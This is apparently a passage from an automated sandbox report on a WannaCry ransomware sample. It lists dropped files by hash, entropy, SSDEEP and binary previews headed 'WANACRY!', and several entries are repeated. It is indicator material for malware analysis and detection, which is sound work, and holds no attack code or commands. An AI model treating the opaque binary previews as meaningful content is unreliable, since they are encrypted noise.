                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840187587816311
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk+bvC7WUdvh6poolI0BIXguLDeQtG6+0YdrdDpHNQb0Rak11f10d4ZdGHYcx5M:bk+bQWkhqBIwBQtGkMd1NrBqdOdoYcx6
                                                                                      MD5:9793E6C4A1FF96B3862E584EF4CF5A4D
                                                                                      SHA1:70E544939E942B9B5B0BD8C4EE6187285770E4D1
                                                                                      SHA-256:137230D6F6D613FFF99BB75D1709CB8903306090CFFB98E0A13EB84C38AD8DEC
                                                                                      SHA-512:E70E9365DB3DB4F238FAD7EED7261EA0D50A3A5B9C29D130B840ED333C962FFA74ADE41CDDE3C8FF1E4CE94C2F8236431F52C7C9C167216C81A3CBD79937B264
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....4....Ic..{e..'...4.^...G..Y.K;....Z}...)..Rt..%...f8......]...h_.(A4....i!...D...d..M.R..l....:I..s9jg.U...Y..Rn..S..P;......9l.....~..*c\g`gX.......1.&ayV..I(_s`..0..&\.Y.1.9K.Kne.j.....o.E.ID.....o.U..z.V...;...."...f......@.K8..b...m.p.............>..C..T....T..v..........B...._+.>+f._L.R...M#....|@..IA..5..T2l......pCB2a.......K r%.-......&.~A......v.E9..<2....:.u.v<.vp........}.#G[]g[...SoE..n..k.Z*.=.`.\.K.u..l".K.(....A...B]Q.>q.m...Z.....>7:i.8.'.B....u6u....Q.. .N.a.OX_..Y.[E..GC...'.......B,...Fx...C.Q.f.l.N.gh..!..6...V......q......c[......5H.B..I.<.a..)....h..D..~\.....%&H..Ik.C.b.\.P:..rn.;c..|.s.....*Z..tU)!j.Bx[/..{[.....M.l.&..0.Hv.....5....y..7.0..}..........H%........[9...;...9M<..............#.Um......~.y3&.y.!..:.`.t.FA.p...Y..5.K...b..........@&..-........Xz....sm.zB......2.Ag.U...){...}..u._x..Gy....U...L^#.rI..>j=K'.qD.J.P.=....\.....4..I;!q.."...H....>j6fe..)..G...w...U.u....A.`."..........h.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841267314203847
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkergU4/MloOoVE0cA7uxCRZwSAQ1IkMOw+Eq+tpY8hGDEiKMzHPDKvUAHKTgZeq:bkerxA5+AImZwgI5sZ6sodEKXZX11
                                                                                      MD5:16DD56444B1961B3F615AEB59FECD08A
                                                                                      SHA1:F76B8778EBB37B4C0D9818FA28D2397FE2D3417B
                                                                                      SHA-256:B16267D3B150E0726CCFF163CF10AB3A536384A6AB3EE0C380D1FCD9F54B9122
                                                                                      SHA-512:D79CA705B119784D86EAF13522455331F5A2B0113995341372C40A446D3140BF044F540A004EB0A37CD24B6E677FD9E84C8B64105CFC4A51595B7E1787D20D1D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....wL.A.... 8-...l..nNe.D.Wt...?...n.<s.&.Q.....:.#...$.:...5].4`+.YRw1`...J.........p..mSN..V.B...4..../]......A>*.Tb.R.2K.....36}M|l.......u.Q;.&...?+4..e.......B...*&..4....p....9.PG....B.R.Y..+...M.0>\.8.C.....yW.s.....b.9C.Vd._..#.i.$N.U...H.................O.ANx!.>.tP|.....X.iiE.8:..>.9.8,..V...6.t...5>...e....L..j.i.Vx.v.bn.5...^^!.t.!=....W...a.o.).z........yB.*.t..P.......}.uK.y..*....0.|->.].....}3..7.k...E\.?.....$ ..Hl.D.+("'...%uk.k.G...p.&v.....$.oS..CSz...S.....mY...+xc.=..6.B/..".j.L.#......X..m......ziV|..........D...Q2.8..7..V..Y..S+.....u.Cz......?.<OF..H..+..H.4T..Y.Hj.XO\.] ...g#.T......l..Zk=q..%.....]Ag..Z.M5..>..:.=.^l~..c...F..[...@e..Js.P..).<...N..|.......<.....]...c#...m,..._t.....e.?;....|....P..r.e.}.h.......ir..X.@..p....o.9.;..r.....uX\.....f...w.....t.....5a........l\..K.F...F..L*..p.C.@.N).M..r$.F.......Z.O..m.V.Ne....9.......wx....zv..+...z.t.x...g.4SH..x=G.Y.Z...5..._..S.......r#2O?]U....@b......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841267314203847
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkergU4/MloOoVE0cA7uxCRZwSAQ1IkMOw+Eq+tpY8hGDEiKMzHPDKvUAHKTgZeq:bkerxA5+AImZwgI5sZ6sodEKXZX11
                                                                                      MD5:16DD56444B1961B3F615AEB59FECD08A
                                                                                      SHA1:F76B8778EBB37B4C0D9818FA28D2397FE2D3417B
                                                                                      SHA-256:B16267D3B150E0726CCFF163CF10AB3A536384A6AB3EE0C380D1FCD9F54B9122
                                                                                      SHA-512:D79CA705B119784D86EAF13522455331F5A2B0113995341372C40A446D3140BF044F540A004EB0A37CD24B6E677FD9E84C8B64105CFC4A51595B7E1787D20D1D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....wL.A.... 8-...l..nNe.D.Wt...?...n.<s.&.Q.....:.#...$.:...5].4`+.YRw1`...J.........p..mSN..V.B...4..../]......A>*.Tb.R.2K.....36}M|l.......u.Q;.&...?+4..e.......B...*&..4....p....9.PG....B.R.Y..+...M.0>\.8.C.....yW.s.....b.9C.Vd._..#.i.$N.U...H.................O.ANx!.>.tP|.....X.iiE.8:..>.9.8,..V...6.t...5>...e....L..j.i.Vx.v.bn.5...^^!.t.!=....W...a.o.).z........yB.*.t..P.......}.uK.y..*....0.|->.].....}3..7.k...E\.?.....$ ..Hl.D.+("'...%uk.k.G...p.&v.....$.oS..CSz...S.....mY...+xc.=..6.B/..".j.L.#......X..m......ziV|..........D...Q2.8..7..V..Y..S+.....u.Cz......?.<OF..H..+..H.4T..Y.Hj.XO\.] ...g#.T......l..Zk=q..%.....]Ag..Z.M5..>..:.=.^l~..c...F..[...@e..Js.P..).<...N..|.......<.....]...c#...m,..._t.....e.?;....|....P..r.e.}.h.......ir..X.@..p....o.9.;..r.....uX\.....f...w.....t.....5a........l\..K.F...F..L*..p.C.@.N).M..r$.F.......Z.O..m.V.Ne....9.......wx....zv..+...z.t.x...g.4SH..x=G.Y.Z...5..._..S.......r#2O?]U....@b......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8483506748277305
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkT+s2DGi6IXvoDMeyvNANsmFScOHvVmVeTYD6xWtYm2XPSqDBNGt:bkTl7i64g/8mEJH9ipKPSqBNG
                                                                                      MD5:E23D72C28CF804E59155C7957C73C256
                                                                                      SHA1:726BEC5625634B3EC3D6F98E28858F0361C0BF51
                                                                                      SHA-256:A8D691295AE9C7C3ABE0C57FBDC03523C1527CAD8F97A2B63AB46174798589CF
                                                                                      SHA-512:C1E44477FAFD9338C8E641B7DEE9391D0FB63B3A5AD48D44E9B4EED921E79FB0744B76C06C370F6E1093B083977C4F7A37AF8E17A9D4B9CE5E0FE3C0BAC75527
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....2....Ys/.v.....J...Yc.Gy.[.....M...v.+p...G.'.9.P.W;ex..a...S.V....Y].2...J.@..3..c..t.K....]r\u.{....l..~...=}..r$B...p...yg.a......N......ClI+.<Z.R@@}.u.?........I....V..J..K/ ...9w...(>.......&TF...t../..`.K]."..................o....7#.|..Y.U............#...R#..S.^....l...In.......pjXu..9.rn..j2...X...z.0.xu..H.&o..h .ydM.....F..\..s..P.a.Kc.@..%.n.Y..-.......gd.+..7..$.J...TFM.9....6....L..9....l.};..S/['.bM9....MP)V..M.*...C..!......K`N..1;.9..,.]{..1.>z.X*.M...}i!........B.Q.._d..B`...z.......l.+.=a.xr...jig....m.}n0....|.R..;.!u!..6..F....."2N.....$H.X....).T.(CI.&:.x..3.H.j..o..~. ....j..#.0......p^."...0~z ..v.$.+.6....}..Ps..28OH............V+`..d..K.m.....D.j7\..G........2~..Y.^... y..+.-..m.F.pg.....!;T2......5.OI.?......,.Q.n|,...NR.{.......b"...2S...f..8Te.....U.Kk*..&..<&.-6.3.8J..E.e...+.A..dt.:..w...~.i.1*..7..1.......tv.J.......T.P.o....".+.I.....Q. ..q...f.wHc?.+...H.c?-......2..VY.........~..w....%.XQA..%V..KS.B.=
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8483506748277305
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkT+s2DGi6IXvoDMeyvNANsmFScOHvVmVeTYD6xWtYm2XPSqDBNGt:bkTl7i64g/8mEJH9ipKPSqBNG
                                                                                      MD5:E23D72C28CF804E59155C7957C73C256
                                                                                      SHA1:726BEC5625634B3EC3D6F98E28858F0361C0BF51
                                                                                      SHA-256:A8D691295AE9C7C3ABE0C57FBDC03523C1527CAD8F97A2B63AB46174798589CF
                                                                                      SHA-512:C1E44477FAFD9338C8E641B7DEE9391D0FB63B3A5AD48D44E9B4EED921E79FB0744B76C06C370F6E1093B083977C4F7A37AF8E17A9D4B9CE5E0FE3C0BAC75527
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....2....Ys/.v.....J...Yc.Gy.[.....M...v.+p...G.'.9.P.W;ex..a...S.V....Y].2...J.@..3..c..t.K....]r\u.{....l..~...=}..r$B...p...yg.a......N......ClI+.<Z.R@@}.u.?........I....V..J..K/ ...9w...(>.......&TF...t../..`.K]."..................o....7#.|..Y.U............#...R#..S.^....l...In.......pjXu..9.rn..j2...X...z.0.xu..H.&o..h .ydM.....F..\..s..P.a.Kc.@..%.n.Y..-.......gd.+..7..$.J...TFM.9....6....L..9....l.};..S/['.bM9....MP)V..M.*...C..!......K`N..1;.9..,.]{..1.>z.X*.M...}i!........B.Q.._d..B`...z.......l.+.=a.xr...jig....m.}n0....|.R..;.!u!..6..F....."2N.....$H.X....).T.(CI.&:.x..3.H.j..o..~. ....j..#.0......p^."...0~z ..v.$.+.6....}..Ps..28OH............V+`..d..K.m.....D.j7\..G........2~..Y.^... y..+.-..m.F.pg.....!;T2......5.OI.?......,.Q.n|,...NR.{.......b"...2S...f..8Te.....U.Kk*..&..<&.-6.3.8J..E.e...+.A..dt.:..w...~.i.1*..7..1.......tv.J.......T.P.o....".+.I.....Q. ..q...f.wHc?.+...H.c?-......2..VY.........~..w....%.XQA..%V..KS.B.=
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8422436198576415
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6YQqtifVfiEpGBM07MTXEHbkoD0oKVy2LoevuLGXq2mocd+ZRls3imNtksej:bktZtOATBM6MTXE7lDTKVtLo7B2mockj
                                                                                      MD5:273FA13A9731EDC6C35E975BA814DFDB
                                                                                      SHA1:740F52F5E9DDE5B79E8BF6EA36422C998C45280F
                                                                                      SHA-256:629129075C3F644402C524C15D1C5F23F5E08CDB0951B4E8731B46FBBFA81F06
                                                                                      SHA-512:7974C85208E232243C517A6341C5ED7E66A4D410A5BEDD005F3B3057878FEAE40A8FFE5638BC6C8421E3B9590C3385B880D3FE7C03186E1EF162495E7580E54A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....b."9.....>ki...vka]Xv.B...i.Gm....H..Q...b..wA.......D<2;:X...Gt.qA.ap.d2...S...O..l.i..Fx.q.2..g.. ..,.(..e..G.D].K.sRO..G.......sN..y..2...3.#.Y..4m.u....8J....X.B..]..!B..7...8..B....u.3..E<............@..w...>[..T...M...*.........J652a................-......@.E..*...+R;...t..aC..hd..2....x.Pf:..G.I..N....w.b46.e....?..0.b...D.......g.J9..O.?B......lbS.zqJf.=.bQ.l:..q.J...{.Y .MS......p.F..d.$....nw...!...7'>*.[.......b];.v:W1....UY..f.@m.....%..{rb..!/:.J../.I.pO......^.z.]........He..".ni.y.].....2.l..R.f.S..5Ej.0..z"q..ri.+.U.1.....z;.4...,....gw....L.g-0R..*..q......%..t..........3'_....}g.<.l....'....C....9...;-.....1.....;.&J.N..Tg...e.m..Mr{....x..P....b......^...>...A...j$1...{....w,"a....bK...T.Y...|...+> ..Z...k....c[...{.=.W.6*.9.M...Jq.3....Q;+c..\...R....~5T..r}..9.(.....x.d..'..W... 7^y..w..Cc..cOw...|.1%..;+U....YQ....W/...)D?...!.#.,.yB.2....QE..x";.2....VX./.....*.4...~..p.e...<.YGG...ikF...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8422436198576415
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6YQqtifVfiEpGBM07MTXEHbkoD0oKVy2LoevuLGXq2mocd+ZRls3imNtksej:bktZtOATBM6MTXE7lDTKVtLo7B2mockj
                                                                                      MD5:273FA13A9731EDC6C35E975BA814DFDB
                                                                                      SHA1:740F52F5E9DDE5B79E8BF6EA36422C998C45280F
                                                                                      SHA-256:629129075C3F644402C524C15D1C5F23F5E08CDB0951B4E8731B46FBBFA81F06
                                                                                      SHA-512:7974C85208E232243C517A6341C5ED7E66A4D410A5BEDD005F3B3057878FEAE40A8FFE5638BC6C8421E3B9590C3385B880D3FE7C03186E1EF162495E7580E54A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....b."9.....>ki...vka]Xv.B...i.Gm....H..Q...b..wA.......D<2;:X...Gt.qA.ap.d2...S...O..l.i..Fx.q.2..g.. ..,.(..e..G.D].K.sRO..G.......sN..y..2...3.#.Y..4m.u....8J....X.B..]..!B..7...8..B....u.3..E<............@..w...>[..T...M...*.........J652a................-......@.E..*...+R;...t..aC..hd..2....x.Pf:..G.I..N....w.b46.e....?..0.b...D.......g.J9..O.?B......lbS.zqJf.=.bQ.l:..q.J...{.Y .MS......p.F..d.$....nw...!...7'>*.[.......b];.v:W1....UY..f.@m.....%..{rb..!/:.J../.I.pO......^.z.]........He..".ni.y.].....2.l..R.f.S..5Ej.0..z"q..ri.+.U.1.....z;.4...,....gw....L.g-0R..*..q......%..t..........3'_....}g.<.l....'....C....9...;-.....1.....;.&J.N..Tg...e.m..Mr{....x..P....b......^...>...A...j$1...{....w,"a....bK...T.Y...|...+> ..Z...k....c[...{.=.W.6*.9.M...Jq.3....Q;+c..\...R....~5T..r}..9.(.....x.d..'..W... 7^y..w..Cc..cOw...|.1%..;+U....YQ....W/...)D?...!.#.,.yB.2....QE..x";.2....VX./.....*.4...~..p.e...<.YGG...ikF...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8439591762529
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkZAfFnjKM2Xg1g+1IPg/w3brUcOXlVWU8UEImmg2ae7Apn8M9/8kd:bkG9njKMug1g+qIo3bwcOXlGU6+ag8ld
                                                                                      MD5:6DF8460D36B679E841F53304A649249C
                                                                                      SHA1:3C6800B48545B8D62BC97EA4C759AF09ED3FDDF0
                                                                                      SHA-256:3DB70675DF126E05867F911F392889CC4AC78D634278A98733639A5855B79DAC
                                                                                      SHA-512:FFC188751D4782F825C1FFAEFC2D02A54F7BC40A90ECC8DF54AEFC8918805D2B4F49C641EFAB23F014CF7BA75560A0C91DE61CA4E95A2618490875354D2406F4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....`-..2$......Z...E.)....n.J.]E....p.Aq7..."S.M.9&! .h...M.....?.M.U.....EW$..F.)+..'.....(..<.N.&..xf(&."...%.7..q.HC..~..<..`....]gg':.-.t{.}.;->......aM<.'Mfl"n....o....tT.."........Y...."_=..d..O.?.C.aE.av}.f.........|.M...6N!.&..Y.t}..Dw.1f............z..i%..S.m.RfE.d..M.u..Tu.@..f$.He.=.sb.3...<.{....4..3h5{..M..u.P<.H.%.DJ.lw..0#.d_&....m.9.........1-]....p..("\_..'4.Z..Q......^.#.Lx.....]u.fs.3&t'`.&,*..K.\:.wJ:<w.^*..E..:..]0-.G.[H..ss..&.u6u.B.$\.;....e.C..^...J6.(..........kV..+4.W.%..$.......'.P4..b.f.}..@..P.!.2.xwC0.t.R.y..pS24......j..a.!.R=a3|.s...q....1..@.. .'...R...@@g .W0..6....m..P|UM....?..(L....Mk.. 5.>.4.n%Yx......pp...g...\[F...17.K....BKG.>K.1`....l...e..RW~..J=..v..(7..8: ..xe.X.&.B.cQ..4.Y...X..C...?..g..V...R._..B/<......L.....x....._+.1^...)W.AX...X.>h9.3.yO7h3...8..r\...t.@q~.L..j.pt.....!.%<I.U..#..J:.}....oKo.1,ub....I.-..q..#.....}|.S.>.D.!..>l1.Ie.%9P....:.....E>p.fh!....0.9O\.......4...?..}.Y.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8439591762529
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkZAfFnjKM2Xg1g+1IPg/w3brUcOXlVWU8UEImmg2ae7Apn8M9/8kd:bkG9njKMug1g+qIo3bwcOXlGU6+ag8ld
                                                                                      MD5:6DF8460D36B679E841F53304A649249C
                                                                                      SHA1:3C6800B48545B8D62BC97EA4C759AF09ED3FDDF0
                                                                                      SHA-256:3DB70675DF126E05867F911F392889CC4AC78D634278A98733639A5855B79DAC
                                                                                      SHA-512:FFC188751D4782F825C1FFAEFC2D02A54F7BC40A90ECC8DF54AEFC8918805D2B4F49C641EFAB23F014CF7BA75560A0C91DE61CA4E95A2618490875354D2406F4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....`-..2$......Z...E.)....n.J.]E....p.Aq7..."S.M.9&! .h...M.....?.M.U.....EW$..F.)+..'.....(..<.N.&..xf(&."...%.7..q.HC..~..<..`....]gg':.-.t{.}.;->......aM<.'Mfl"n....o....tT.."........Y...."_=..d..O.?.C.aE.av}.f.........|.M...6N!.&..Y.t}..Dw.1f............z..i%..S.m.RfE.d..M.u..Tu.@..f$.He.=.sb.3...<.{....4..3h5{..M..u.P<.H.%.DJ.lw..0#.d_&....m.9.........1-]....p..("\_..'4.Z..Q......^.#.Lx.....]u.fs.3&t'`.&,*..K.\:.wJ:<w.^*..E..:..]0-.G.[H..ss..&.u6u.B.$\.;....e.C..^...J6.(..........kV..+4.W.%..$.......'.P4..b.f.}..@..P.!.2.xwC0.t.R.y..pS24......j..a.!.R=a3|.s...q....1..@.. .'...R...@@g .W0..6....m..P|UM....?..(L....Mk.. 5.>.4.n%Yx......pp...g...\[F...17.K....BKG.>K.1`....l...e..RW~..J=..v..(7..8: ..xe.X.&.B.cQ..4.Y...X..C...?..g..V...R._..B/<......L.....x....._+.1^...)W.AX...X.>h9.3.yO7h3...8..r\...t.@q~.L..j.pt.....!.%<I.U..#..J:.}....oKo.1,ub....I.-..q..#.....}|.S.>.D.!..>l1.Ie.%9P....:.....E>p.fh!....0.9O\.......4...?..}.Y.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858426779381035
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkiHmfc1pcqsfoEJACAP5TZls+XLZQNT7AAdJOGY7erD2G5fMhGDT:bkiHEiE2CAPTlNXLZQJdQd70f5fM6
                                                                                      MD5:E8639AF5A0A070A7F5F31BAC7A46BB60
                                                                                      SHA1:E013A270A5981B1B8690F167B4E3E9C2A50D6123
                                                                                      SHA-256:F3D141FDE3A937C1E0FB16F2B03D3720580535E66178E8B883501ECF6AB3DD9D
                                                                                      SHA-512:A1CC5B510EB5F38197930D9BA3302DCEE23521EC3868CCF07A85F112B0223F10A200C10B73661E6B086B3A584865C6CAED0D16C79C8F993627AEEFFF3A613F24
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........%..4K-V..~>N.YB.-..8....r..AXO.?.W_....C..5..Ct........ ..6.(X.._T=x.r.o3.a....!e....2......m.^p..a..-T-^.........."......Ep......jDc..[...v......3.1K.@..0..4..`;O..4M...n.S.(..;e.....L.........V.?2....'.u...1..qIg.(ahX...j.1a..>u=N..~............,d...TXv....j.?....>{z...y.G.J.k.1.hhg>@T.........O.8${..g.?...P.Q.@. (vG?Jb.#...'..J.....a8J..b.:"H..R.........).&B...;..`..k...4g.....Y`.q#e...&E.(..-...4.....}.{P.7w....{r....V^...J..$.E_..3_q..\.83.o."..G~@..../.......B...<|..u.t.mY.d.U.<..c.7y+...?].NX<...D"..N.@.rlx..z...MZ.|^J!.../..VQuiL.u..#Y.E(....q......uW...S...r}*..2.!.9..g.a\Dz..N.B~~.....@'o...+.sJ....w.......k.kYh..H..^...t..l....F.Q....95...m...q...=.Q.3t>.......N.(C*.P...2.Y..]=T...'2.8kS....#..ZZ.w`...e..s.q...Xi|.l.....s..BB...a..hiy.C..R.7_+.6n..z.;.e...Vj.o.H.zU.m&..y..SD..J....uj....K.c..F:.M.......=7..}...(.S..,.^..=.e..;w.I.......w.Y...........sN..RD..sDp.6.v.....K.pGF.:z...kL...|]..=....9..n.z...$.%.p..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858426779381035
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkiHmfc1pcqsfoEJACAP5TZls+XLZQNT7AAdJOGY7erD2G5fMhGDT:bkiHEiE2CAPTlNXLZQJdQd70f5fM6
                                                                                      MD5:E8639AF5A0A070A7F5F31BAC7A46BB60
                                                                                      SHA1:E013A270A5981B1B8690F167B4E3E9C2A50D6123
                                                                                      SHA-256:F3D141FDE3A937C1E0FB16F2B03D3720580535E66178E8B883501ECF6AB3DD9D
                                                                                      SHA-512:A1CC5B510EB5F38197930D9BA3302DCEE23521EC3868CCF07A85F112B0223F10A200C10B73661E6B086B3A584865C6CAED0D16C79C8F993627AEEFFF3A613F24
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........%..4K-V..~>N.YB.-..8....r..AXO.?.W_....C..5..Ct........ ..6.(X.._T=x.r.o3.a....!e....2......m.^p..a..-T-^.........."......Ep......jDc..[...v......3.1K.@..0..4..`;O..4M...n.S.(..;e.....L.........V.?2....'.u...1..qIg.(ahX...j.1a..>u=N..~............,d...TXv....j.?....>{z...y.G.J.k.1.hhg>@T.........O.8${..g.?...P.Q.@. (vG?Jb.#...'..J.....a8J..b.:"H..R.........).&B...;..`..k...4g.....Y`.q#e...&E.(..-...4.....}.{P.7w....{r....V^...J..$.E_..3_q..\.83.o."..G~@..../.......B...<|..u.t.mY.d.U.<..c.7y+...?].NX<...D"..N.@.rlx..z...MZ.|^J!.../..VQuiL.u..#Y.E(....q......uW...S...r}*..2.!.9..g.a\Dz..N.B~~.....@'o...+.sJ....w.......k.kYh..H..^...t..l....F.Q....95...m...q...=.Q.3t>.......N.(C*.P...2.Y..]=T...'2.8kS....#..ZZ.w`...e..s.q...Xi|.l.....s..BB...a..hiy.C..R.7_+.6n..z.;.e...Vj.o.H.zU.m&..y..SD..J....uj....K.c..F:.M.......=7..}...(.S..,.^..=.e..;w.I.......w.Y...........sN..RD..sDp.6.v.....K.pGF.:z...kL...|]..=....9..n.z...$.%.p..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.860273510842785
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk4MDUPxGNsFK4ui38rvBuy6yILdqRgsrS6w0c7nl52ck/GsZDTQ:bkWJ6T4elRCwO7CckusZDTQ
                                                                                      MD5:BA3DFA12DCC45E03FA8A94348EAA60E3
                                                                                      SHA1:69B8E079044CC8B00478A0AA3385F1A1FED30F9A
                                                                                      SHA-256:7F89CBDEFEF382271AE397DE98B60747D8BF3FD73A75604C203415657B056D99
                                                                                      SHA-512:527F348DFB1601C1558EA9E5E974681B619D3EAFF92BB205F85E8F78AC201D243A0807CBFD4D99667EF71A3BAA1AE0BDDD49FDAE9E44ED630F26DF501010DEBD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......o..[...$.4$.X.VO....2\..Il..N{.._e....J.>g..z......:X...s....:..zH..-g..,`.-..j`dH..W..s.\.h...N=_.x..Df.\6+........(tH.4.G..".,M.T..'.|........;/..;..~Vfs.......O......A..t%.:..Z..Vi.....v..l8.59...<.=1hf..au.>[=..I.GD..:HZj.........gG..................}....p.d.wd1....-..x.....t.m.....tA..9..`.JNE..K|....9.=x..L..8l...|.OcL.t...!<..S..L...... .K.[E..I7...5...|..;.W/......u.k.*JX...\7.W...RHRm}....R4..\.(..X)c..@........<..E..&...`...FZQ..c...D(.<...DC.7.8....z...........i.2.b......./..d.L...8.U^.../.Z..N../h.yD.........-G...._...{.+`..3...0.`=.I.pp..s..n5.......".:..6.K|wj/._.I.....h...,X....y...3....{...q.....#v....orsAW.....X.L&J...S..... m..,.._...Z'=..n....$5yFe....3(v.......n|.cy.t..z.0.T.n..mk..+..#..@[..4...$..Q.4....#.d..X.~.....#.*.gS?qrB.q.x.%..5....lu:~..G...j.....+Gt.i...J....%-......B+._.#.<.[%.H..|...7t.1-^R.<....}.k..^N?.,....S.)[.K.2:....~q.~..8u.$.l{4^.....p.*p..m....).X...T?-0_Dx.=C..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.860273510842785
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk4MDUPxGNsFK4ui38rvBuy6yILdqRgsrS6w0c7nl52ck/GsZDTQ:bkWJ6T4elRCwO7CckusZDTQ
                                                                                      MD5:BA3DFA12DCC45E03FA8A94348EAA60E3
                                                                                      SHA1:69B8E079044CC8B00478A0AA3385F1A1FED30F9A
                                                                                      SHA-256:7F89CBDEFEF382271AE397DE98B60747D8BF3FD73A75604C203415657B056D99
                                                                                      SHA-512:527F348DFB1601C1558EA9E5E974681B619D3EAFF92BB205F85E8F78AC201D243A0807CBFD4D99667EF71A3BAA1AE0BDDD49FDAE9E44ED630F26DF501010DEBD
                                                                                      Malicious:false
                                                                                      Reputation:low
